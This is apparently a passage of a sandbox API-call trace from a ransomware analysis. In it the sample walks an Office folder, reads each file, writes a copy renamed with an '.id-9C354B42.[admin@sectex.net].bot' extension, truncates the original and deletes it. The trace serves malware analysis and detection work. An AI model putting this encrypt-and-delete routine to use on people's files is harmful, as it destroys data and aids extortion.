	[0147.389] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 62
	[0147.390] lstrlenW (lpString=".dbf") returned 4
	[0147.390] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 62
	[0147.390] lstrlenW (lpString=".1cd") returned 4
	[0147.390] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 62
	[0147.390] lstrlenW (lpString=".jpg") returned 4
	[0147.390] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 62
	[0147.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 62
	[0147.390] lstrlenW (lpString=".doc") returned 4
	[0147.390] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.390] lstrlenW (lpString=".docx") returned 5
	[0147.390] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0147.390] lstrlenW (lpString=".pdf") returned 4
	[0147.390] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.390] lstrlenW (lpString=".xls") returned 4
	[0147.390] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.390] lstrlenW (lpString=".xlsx") returned 5
	[0147.390] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0147.390] lstrlenW (lpString=".ppt") returned 4
	[0147.390] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 62
	[0147.390] lstrlenW (lpString=".zip") returned 4
	[0147.390] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.390] lstrlenW (lpString=".rar") returned 4
	[0147.390] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.390] lstrlenW (lpString=".bz2") returned 4
	[0147.390] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.391] lstrlenW (lpString=".7z") returned 3
	[0147.391] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 62
	[0147.391] lstrlenW (lpString=".dbf") returned 4
	[0147.391] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 62
	[0147.391] lstrlenW (lpString=".1cd") returned 4
	[0147.391] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.391] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL") returned 62
	[0147.391] lstrlenW (lpString=".jpg") returned 4
	[0147.391] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.391] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0147.391] lstrlenW (lpString="MOR6INT.DLL") returned 11
	[0147.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.392] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=446312) returned 1
	[0147.392] CloseHandle (hObject=0x2a0) returned 1
	[0147.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.dll")) returned 0x20
	[0147.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0147.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59
	[0147.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59
	[0147.392] lstrlenW (lpString=".doc") returned 4
	[0147.392] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.392] lstrlenW (lpString=".docx") returned 5
	[0147.392] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0147.392] lstrlenW (lpString=".pdf") returned 4
	[0147.392] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.392] lstrlenW (lpString=".xls") returned 4
	[0147.392] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.392] lstrlenW (lpString=".xlsx") returned 5
	[0147.392] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0147.392] lstrlenW (lpString=".ppt") returned 4
	[0147.392] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59
	[0147.392] lstrlenW (lpString=".zip") returned 4
	[0147.393] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.393] lstrlenW (lpString=".rar") returned 4
	[0147.393] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.393] lstrlenW (lpString=".bz2") returned 4
	[0147.393] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.393] lstrlenW (lpString=".7z") returned 3
	[0147.393] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59
	[0147.393] lstrlenW (lpString=".dbf") returned 4
	[0147.393] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59
	[0147.393] lstrlenW (lpString=".1cd") returned 4
	[0147.393] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59
	[0147.393] lstrlenW (lpString=".jpg") returned 4
	[0147.393] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59
	[0147.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59
	[0147.393] lstrlenW (lpString=".doc") returned 4
	[0147.393] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0147.393] lstrlenW (lpString=".docx") returned 5
	[0147.393] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0147.393] lstrlenW (lpString=".pdf") returned 4
	[0147.393] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0147.393] lstrlenW (lpString=".xls") returned 4
	[0147.393] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0147.393] lstrlenW (lpString=".xlsx") returned 5
	[0147.393] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0147.393] lstrlenW (lpString=".ppt") returned 4
	[0147.393] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0147.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59
	[0147.394] lstrlenW (lpString=".zip") returned 4
	[0147.394] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0147.394] lstrlenW (lpString=".rar") returned 4
	[0147.394] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0147.394] lstrlenW (lpString=".bz2") returned 4
	[0147.394] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0147.394] lstrlenW (lpString=".7z") returned 3
	[0147.394] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59
	[0147.394] lstrlenW (lpString=".dbf") returned 4
	[0147.394] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0147.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59
	[0147.394] lstrlenW (lpString=".1cd") returned 4
	[0147.394] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0147.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.DLL") returned 59
	[0147.394] lstrlenW (lpString=".jpg") returned 4
	[0147.394] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0147.394] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0147.394] lstrlenW (lpString="MOR6INT.REST.IDX_DLL") returned 20
	[0147.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.395] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=39808) returned 1
	[0147.395] CloseHandle (hObject=0x2a0) returned 1
	[0147.395] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.rest.idx_dll")) returned 0x20
	[0147.395] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.395] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.395] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0147.396] GetLastError () returned 0x0
	[0147.396] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x9b80, lpOverlapped=0x0) returned 1
	[0147.401] WriteFile (in: hFile=0x3b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x9b90, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x9b90, lpOverlapped=0x0) returned 1
	[0147.402] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.402] WriteFile (in: hFile=0x3b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0147.403] SetEndOfFile (hFile=0x3b8) returned 1
	[0147.403] CloseHandle (hObject=0x3b8) returned 1
	[0147.403] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.403] SetEndOfFile (hFile=0x2a0) returned 1
	[0147.589] CloseHandle (hObject=0x2a0) returned 1
	[0147.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.624] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mor6int.rest.idx_dll")) returned 1
	[0147.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68
	[0147.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68
	[0147.646] lstrlenW (lpString=".doc") returned 4
	[0147.646] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0147.646] lstrlenW (lpString=".docx") returned 5
	[0147.646] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0147.646] lstrlenW (lpString=".pdf") returned 4
	[0147.646] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0147.646] lstrlenW (lpString=".xls") returned 4
	[0147.646] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0147.646] lstrlenW (lpString=".xlsx") returned 5
	[0147.647] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0147.647] lstrlenW (lpString=".ppt") returned 4
	[0147.647] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0147.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68
	[0147.647] lstrlenW (lpString=".zip") returned 4
	[0147.647] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0147.647] lstrlenW (lpString=".rar") returned 4
	[0147.647] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0147.647] lstrlenW (lpString=".bz2") returned 4
	[0147.647] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0147.647] lstrlenW (lpString=".7z") returned 3
	[0147.647] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68
	[0147.647] lstrlenW (lpString=".dbf") returned 4
	[0147.647] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0147.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68
	[0147.647] lstrlenW (lpString=".1cd") returned 4
	[0147.647] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0147.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68
	[0147.647] lstrlenW (lpString=".jpg") returned 4
	[0147.647] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0147.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68
	[0147.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68
	[0147.647] lstrlenW (lpString=".doc") returned 4
	[0147.647] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0147.647] lstrlenW (lpString=".docx") returned 5
	[0147.647] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0147.647] lstrlenW (lpString=".pdf") returned 4
	[0147.647] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0147.647] lstrlenW (lpString=".xls") returned 4
	[0147.648] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0147.648] lstrlenW (lpString=".xlsx") returned 5
	[0147.648] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0147.648] lstrlenW (lpString=".ppt") returned 4
	[0147.648] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0147.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68
	[0147.648] lstrlenW (lpString=".zip") returned 4
	[0147.648] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0147.648] lstrlenW (lpString=".rar") returned 4
	[0147.648] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0147.648] lstrlenW (lpString=".bz2") returned 4
	[0147.648] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0147.648] lstrlenW (lpString=".7z") returned 3
	[0147.648] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0147.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68
	[0147.648] lstrlenW (lpString=".dbf") returned 4
	[0147.648] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0147.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68
	[0147.648] lstrlenW (lpString=".1cd") returned 4
	[0147.648] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0147.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOR6INT.REST.IDX_DLL") returned 68
	[0147.648] lstrlenW (lpString=".jpg") returned 4
	[0147.648] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0147.648] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0147.648] lstrlenW (lpString="MSACCESS.DEV_COL.HXT") returned 20
	[0147.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.649] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=212) returned 1
	[0147.649] CloseHandle (hObject=0x268) returned 1
	[0147.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxt")) returned 0x20
	[0147.649] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0147.649] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.650] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.650] GetLastError () returned 0x0
	[0147.650] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xd4, lpOverlapped=0x0) returned 1
	[0147.651] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0147.652] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.652] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0147.652] SetEndOfFile (hFile=0x384) returned 1
	[0147.652] CloseHandle (hObject=0x384) returned 1
	[0147.652] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.652] SetEndOfFile (hFile=0x268) returned 1
	[0147.655] CloseHandle (hObject=0x268) returned 1
	[0147.655] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.655] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxt")) returned 1
	[0147.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT") returned 68
	[0147.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT") returned 68
	[0147.655] lstrlenW (lpString=".doc") returned 4
	[0147.655] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0147.655] lstrlenW (lpString=".docx") returned 5
	[0147.655] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0147.656] lstrlenW (lpString=".pdf") returned 4
	[0147.656] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0147.656] lstrlenW (lpString=".xls") returned 4
	[0147.656] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0147.656] lstrlenW (lpString=".xlsx") returned 5
	[0147.656] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0147.656] lstrlenW (lpString=".ppt") returned 4
	[0147.656] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0147.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT") returned 68
	[0147.656] lstrlenW (lpString=".zip") returned 4
	[0147.656] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0147.656] lstrlenW (lpString=".rar") returned 4
	[0147.656] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0147.656] lstrlenW (lpString=".bz2") returned 4
	[0147.656] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0147.656] lstrlenW (lpString=".7z") returned 3
	[0147.656] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0147.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT") returned 68
	[0147.656] lstrlenW (lpString=".dbf") returned 4
	[0147.656] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0147.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT") returned 68
	[0147.656] lstrlenW (lpString=".1cd") returned 4
	[0147.656] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0147.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT") returned 68
	[0147.656] lstrlenW (lpString=".jpg") returned 4
	[0147.656] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0147.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT") returned 68
	[0147.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT") returned 68
	[0147.656] lstrlenW (lpString=".doc") returned 4
	[0147.656] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0147.656] lstrlenW (lpString=".docx") returned 5
	[0147.657] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0147.657] lstrlenW (lpString=".pdf") returned 4
	[0147.657] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0147.657] lstrlenW (lpString=".xls") returned 4
	[0147.657] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0147.657] lstrlenW (lpString=".xlsx") returned 5
	[0147.657] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0147.657] lstrlenW (lpString=".ppt") returned 4
	[0147.657] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0147.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT") returned 68
	[0147.657] lstrlenW (lpString=".zip") returned 4
	[0147.657] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0147.657] lstrlenW (lpString=".rar") returned 4
	[0147.657] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0147.657] lstrlenW (lpString=".bz2") returned 4
	[0147.657] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0147.657] lstrlenW (lpString=".7z") returned 3
	[0147.657] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0147.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT") returned 68
	[0147.657] lstrlenW (lpString=".dbf") returned 4
	[0147.657] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0147.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT") returned 68
	[0147.657] lstrlenW (lpString=".1cd") returned 4
	[0147.657] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0147.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT") returned 68
	[0147.657] lstrlenW (lpString=".jpg") returned 4
